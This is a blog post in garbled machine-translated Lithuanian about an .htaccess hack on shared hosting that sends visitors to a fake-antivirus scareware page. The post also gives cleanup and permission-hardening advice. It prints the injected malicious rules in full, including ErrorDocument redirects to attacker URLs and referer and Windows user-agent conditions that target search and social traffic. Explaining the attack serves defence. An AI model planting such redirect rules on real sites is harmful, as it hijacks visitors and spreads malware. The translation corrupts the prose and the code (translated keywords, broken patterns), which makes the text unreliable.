Kenkėjiškų programų / Virus -. Marija: "perrašyti" ir nukreipti

Naujos formos virusas kuri matau ne žinoti daug, įtakos svetainėse, priglobtose nepatikimi serveriai kur vartotojų paskyros / sub sąskaitas gali "matyti" vienas kitą. Tiksliau, hostingo sąskaitos yra visi įdėti į aplanką "vhosts"Rašymas ir teisė vartotojo aplankas kad "vhosts" pateikiama bendra vartotojo ... pardavėja daugelyje situacijų. Tai tipiškas interneto serverių, kurie nenaudoja WHM / Cpanel.

.Htaccess - .htaccess Hack veiksmas

Virusas įtakos failus .htaccess Svetainės aukos. Aš pridėjo linijos / Direktyva į peradresuoti lankytojų (Atvykstant iš Yahoo, MSN, "Google", "Facebook", yaindex, Twitter, MySpace, ir tt tinklaviečių ir portalų su didelio eismo), kad kai kurių svetainių, kurios siūlo "antivirusinė. "Tai Pranešk apie netikrą antivirusinęKuris rašiau įvade .

Tai kaip .htaccess įtakos: (negali pasiekti turinio URL šias eilutes)

ErrorDocument 500 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=0
ErrorDocument 502 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=2
ErrorDocument 403 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=3

RewriteEngine Apie

RewriteCond% {HTTP_REFERER} *. Yandex. * $ [NC, OR]
RewriteCond% {HTTP_REFERER} *. Odnoklassniki. * $ [NC, OR]
RewriteCond% {HTTP_REFERER} *. VKontakte. * $ [NC, OR]
RewriteCond% {HTTP_REFERER} *. Puslapis. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Vamzdžių. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Mokėjimo. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Blogger ". * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Baidu ". * $ [NC, OR]
RewriteCond% {HTTP_REFERER} *. Qq.com. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * MySpace. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * "Twitter". * $ [NC, OR]
RewriteCond% {HTTP_REFERER} *. "Facebook". * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * "Google". * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Live. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * AOL. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * "Bing". * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * MSN *. $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * "Amazon". * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * EBay. * $ [NC, OR]
RewriteCond% {HTTP_REFERER} *. LinkedIn ". * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * "Flickr". * $ [NC, OR]
RewriteCond% {HTTP_REFERER} *. LiveJasmin. * $ [NC, OR]
RewriteCond% {HTTP_REFERER} *. Pušų. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * DoubleClick ". * $ [NC, OR]
RewriteCond% {HTTP_REFERER} *. Pornhub. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * "Orkut". * $ [NC, OR]
RewriteCond% {HTTP_REFERER} *. LiveJournal ". * $ [NC, OR]
RewriteCond% {HTTP_REFERER} *. WordPress. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * "Yahoo". * $ [NC, OR]
RewriteCond% {HTTP_REFERER} *. Paklausti. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Excite. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * AltaVista. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * MSN *. $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * "Netscape. * $ [NC, OR]
RewriteCond% {HTTP_REFERER} *. HotBot. * $ [NC, OR]
RewriteCond% {HTTP_REFERER} *. Pereiti. * $ [NC, OR]
RewriteCond% {HTTP_REFERER} *. Infoseek. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Mama. * $ [NC, OR]
RewriteCond% {HTTP_REFERER} *. AllTheWeb. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Lycos. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Ieškoti *. $ [NC, OR]
RewriteCond% {HTTP_REFERER} *. Metacrawler. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Paštas *. $ [NC, OR]
RewriteCond% {HTTP_REFERER} *. Dogpile. * $ [NC]

„RewriteCond% {HTTP_USER_AGENT}. *Windows.*
RewriteRule. * [R L]

RewriteCond% {REQUEST_FILENAME}!-F
RewriteCond% {REQUEST_FILENAME}!-D
RewriteCond% {REQUEST_FILENAME} * JPG $ |!. *. Gif $ | *. PNG $
„RewriteCond% {HTTP_USER_AGENT}. *Windows.*
RewriteRule. * [R L]

Tie, kurie naudoja WordPress rasite šias eilutes į failą .htaccess nuo public_html. Be to, virusas sukuria. Identiškos htaccess aplanke WP-kiekis.

*Taip pat yra atvejų, kai vietoj įvyksta peoriavascularsurgery.com dns.thesoulfoodcafe.com arba kitais adresais.

Kas daro šį virusą.

Kai nukreipti, lankytojas sutiktas su atviromis rankomis su pranešimu:

Dėmesio!
Jūsų kompiuteris yra įvairių požymių virusų ir kenkėjiškų programų buvimą. Jūsų nedelsiant reikalauja antivirusinę sistemos patikrinimas!
Apsaugos sistema atliks greitai ir nemokamai nuskaitymo savo kompiuterį nuo virusų ir kenkėjiškų programų.

1 kenkėjiškų programų

Nesvarbu, kurį mygtuką, mes atsižvelgti į puslapį "Mano kompiuteris"Sukurtas imituoti dizainas XP ". Tai automatiškai pradeda "nuskaitymo" pabaigoje, iš kurių matome, kad "užsikrėsti".

2 kenkėjiškų programų

Kai paspausite OK arba Cancel, jis pradeda parsisiųstiFailas ųjų Setup.exe. Tai Setup.exe yra suklastotas Anti-Virus paveikti sistemą. Jūs įdiegti kai kurie kenkėjiškų programų propaguoti Kitos nuorodos virusas, ir be jų antivirusinė programinė įranga (visi klaidingi), kad auka yra kviečiama pirkti.
Tie, kurie jau kreipėsi į virusą gali naudoti šią formą . Taip pat rekomenduojama nuskaityti visą HDD. Rekomenduoti "Kaspersky Internet Security" arba Kaspersky Anti-Virus.

Šis virusas veikia Visitor OS operacines sistemas Windows XP Windows ME Windows 2000, Windows NT Windows 98 si Windows 95. Kol kas nežinoma operacinių sistemų užkrėtimo atvejų Windows Akivaizdu, kad taip Windows 7.

Kaip mes galime pašalinti šį virusą. Htaccess failą į serverį, ir kaip išvengti infekcijos.

1. Analizuoti įtartinus failus ir ištrinti kodus. Siekiant užtikrinti, kad failas yra ne tik paveikė .htaccess geriau analizuoti visus failus . PHP si . Js.

2. Perrašyti failą. Marija: ir aš nustatyti chmod 644 arba 744 su rašymo prieigą tik vartotojo šeimininkas.

3. Kai kuriate hostingo sąskaitą už aplanke svetainėje / Pagrindinis puslapis arba / Webroot Tai bus automatiškai sukurti aplanką, kuris neretai vartotojo vardą (vartotojas už cPanel, FTPIr kt.) Siekiant išvengti rašymo duomenis ir virusų perdavimo iš vieno vartotojo į kitą, yra rekomenduojama, kad kiekvienas vartotojas aplankas turi būti nustatyta:

chmod arba 644 744, 755 - rodomas 644.
chown-R nume_user nume_folder.
Chgrp-R nume_user nume_folder

ls-visi būdų, kaip patikrinti, ar jie buvo atlikti teisingai. Turėtų atrodyti maždaug taip:

drwx-x-x 12 dinamika dinamika 4096 Gegužės 6 14: 51 dinamika /
drwx-x-x 10 duran duran 4096 Mar 7 07: 46 duran /
drwx-x-x 12 vamzdžių bandymo vamzdis 4096 Jan 29 11: 23 vamzdelis /
drwxr-xr-x 14 Express 4096 vasaris 26 2009 Express /
drwxr-xr-x 9 ezo ezo 4096 Gegužė 19 01: 09 ezo /
drwx-x-x 9 ūkis 4096 ūkis 19 22: ūkis 29 /

Jeigu viena iš pirmiau bus userele FTP Užkrėsti failaiJi negali siųsti virusą kito vartotojo kompiuterio. Tai mažiausias saugus neto apsaugoti sąskaitas talpinami serveryje.

Bendrų elementų srityse, kurioms būdingas šio tipo virusas.

Visi plotai, įtakojami peradresuoti lankytojų į svetaines domenų vardų, kuriuose yra "/".

Šis "virusas. htaccess"Įtakos bet CMS tipą (Joomla, WordPress, phpBBIr tt), kuri naudoja .htaccess.

. Marija: Nukreipimo Virus Hack &.

Kenkėjiškų programų / Virus -. Marija: "perrašyti" ir nukreipti

Apie autorių

slaptas LP "

Įkūrėjas ir redaktorius Stealth NustatymaiBe 2006 dienos.
„Linux“ operacinių sistemų (ypač „CentOS“), „Mac OS X“, Windows XP> Windows „10“ ir „WordPress“ (CMS).

Palikite komentarą